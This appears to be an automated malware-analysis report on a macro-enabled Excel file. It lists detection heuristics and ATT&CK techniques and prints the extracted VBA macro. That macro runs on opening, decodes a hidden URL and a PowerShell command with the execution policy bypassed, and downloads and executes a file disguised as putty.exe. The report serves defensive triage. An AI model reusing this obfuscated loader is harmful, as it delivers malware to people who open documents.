MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1566.001 Spearphishing Attachment
The file contains an obfuscated VBA macro that executes upon opening the document. The macro decodes a URL and uses PowerShell to download and execute a file named 'putty.exe' from that URL to the user's temporary directory. The presence of a Workbook_Open macro and the use of CreateObject indicate a malicious intent to execute arbitrary code.
Heuristics 6
-
ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4493 bytes |
SHA-256: e55456da77b4621919f5bf42ec0befafe72017d760047b5c72d0b1fa157479d7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader"aHR0cHM6Ly9zZWVkd2VsbHJlc291cmNlcy54eXovUDUxQnpSZjdkdmwydG54LmV4ZQ=="
End Sub
Public Sub Loader(Link As String)
CreateObject(PLsoFgAnMqEWaYTBrAPlKMCbdgTHALKPPAOErwVQQwEEWWW("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJGVudjpUZW1wKydccHV0dHkuZXhlJyk="))
End Sub
Function aw73543hset(str As String) As Variant: Dim bytes() As Byte: bytes = str: aw73543hset = bytes: End Function
Function olt1qbjd6jmpzn75u(bytes() As Byte) As String: Dim str As String: str = bytes: olt1qbjd6jmpzn75u = str: End Function
Function mvkc3mbcvhw4jkzws(str As String) As String
Const VBCGhdMK_ As String = "f03gk5mhyfvplurel"
Dim GKiaNHB_() As Byte, SokNAH_() As Byte
GKiaNHB_ = aw73543hset(str)
SOtAN_ = aw73543hset(VBCGhdMK_)
Dim BoLpaBH As Long
BoLpaBH = UBound(GKiaNHB_)
ReDim KoSoVoBPo_(0 To BoLpaBH) As Byte
Dim idx As Long
For idx = LBound(GKiaNHB_) To BoLpaBH:
If Not GKiaNHB_(idx) = 0 Then
c = GKiaNHB_(idx)
For i = 0 To UBound(SOtAN_):
c = c Xor SOtAN_(i)
Next i
KoSoVoBPo_(idx) = c
End If
Next idx
mvkc3mbcvhw4jkzws = olt1qbjd6jmpzn75u(KoSoVoBPo_)
End Function
Public Function PLsoFgAnMqEWaYTBrAPlKMCbdgTHALKPPAOErwVQQwEEWWW(ByVal EmQZTpMNoPPgDmQqfolNHJfeVdRHwkIRZIvxkPMSoNudyOhjXRiDLln As String) As String
Dim r6b3wnywkvp3pbvbm As String
Dim qjca1yvn2xyx54ak9 As String
Dim lcoaqi9ijjtyi19lv As Long
For PLsoFgAnMqEWaYTBrAMPlKMNBCbdgTHANLKPPAOErwVQQwEEWWW = 1 To Len(EmQZTpMNoPPgDmQqfolNHJfeVdRHwkIRZIvxkPMSoNudyOhjXRiDLln) Step 3
PLsoFgAnMqEWaYTBrAMPlKMCbdgTHALKPPAOErwVQQwEEWWW = Chr$(Val(mvkc3mbcvhw4jkzws(" " & "" & chr(106) ) & Mid$(EmQZTpMNoPPgDmQqfolNHJfeVdRHwkIRZIvxkPMSoNudyOhjXRiDLln, PLsoFgAnMqEWaYTBrAMPlKMNBCbdgTHANLKPPAOErwVQQwEEWWW, 2)))
qjca1yvn2xyx54ak9 = qjca1yvn2xyx54ak9 & PLsoFgAnMqEWaYTBrAMPlKMCbdgTHALKPPAOErwVQQwEEWWW
Next PLsoFgAnMqEWaYTBrAMPlKMNBCbdgTHANLKPPAOErwVQQwEEWWW
PLsoFgAnMqEWaYTBrAPlKMCbdgTHALKPPAOErwVQQwEEWWW = qjca1yvn2xyx54ak9
End Function
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6656 bytes |
SHA-256: dd421c59670f5a4802bc9253e1287cdce80ac159584606c6830c13faca855e12 |
|||
|
Detection
ClamAV:
Xls.Dropper.EPPlus-9802867-2
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.